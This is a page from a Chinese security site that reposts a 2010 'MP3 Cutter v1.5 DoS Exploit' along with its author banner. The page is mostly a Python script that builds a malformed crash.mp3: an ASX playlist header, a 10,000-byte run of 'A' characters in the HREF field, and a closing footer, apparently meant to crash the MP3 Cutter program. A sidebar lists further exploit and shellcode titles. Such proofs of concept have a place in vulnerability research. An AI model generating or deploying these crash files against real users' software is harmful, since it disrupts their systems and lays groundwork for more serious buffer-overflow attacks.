首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MP3 Cutter v1.5 DoS Exploit
来源:www.loxian.co.cc 作者:Uniyal 发布时间:2010-07-12  

##########################################################
##       Legion of Xtremers & Hackers Garage
##       (www.loxian.co.cc)   (www.garage4hackers.com)                                                 
##                     MP3 Cutter 1.5 Crash Exploit
##
##               Author: Prashant a.k.a t3rm!n4t0r         
##            c0ntact: happyterminator@gmail.com       
##                                        
##  Greetz to: vinnu, b0nd, fb1h2s, Anarki, Nikhil, D4RK3ST
###########################################################

 

 


#exploit.py
#MP3 cutter Crash Exploit

print " MP3 Cutter Crash Exploit ( mp3 file ) \n"

          
header1 = (
   "\x3C\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4F\x4E\x3D\x22\x33"
          "\x2E\x30\x22\x3E\x0A\x0A\x3C\x45\x4E\x54\x52\x59\x3E\x3C\x54"
   "\x49\x54\x4C\x45\x3E\x65\x78\x70\x6C\x6F\x69\x74\x3C\x2F\x54"
   "\x49\x54\x4C\x45\x3E\x0A\x3C\x52\x45\x46\x20\x48\x52\x45\x46"
   "\x3D\x22"
   )

header2 = (
   "\x2E\x61\x73\x66\x22\x2F\x3E\x0A\x3C\x2F\x45\x4E\x54\x52\x59"
   "\x3E\x3C\x2F\x41\x53\x58\x3E"
     )
   
crash = "\x41" * 10000

exploit = header1 + crash  + header2

try:
    out_file = open("crash.mp3",'w')
    out_file.write(exploit)
    out_file.close()
    raw_input("\nExploit file created!\n")
except:
    print "Error"

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Shemes Grabbit suffers from a
·Microsoft MSHTML.DLL CTIMEOUTE
·Write-to-file Shellcode (Win32
·Linux/x86-64 - execve("/sbin/i
·Sun Java Web Server 7.0 u7 Exp
·RSP MP3 Player OCX 3.2 ActiveX
·cmd.exe Unicode Buffer Overflo
·Image22 ActiveX v1.1.1 Buffer
·91 bytes Find all writeable fo
·Linux x86 netcat bindshell por
·Ubuntu PAM MOTD File Tampering
·Linux x86 netcat connect back
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved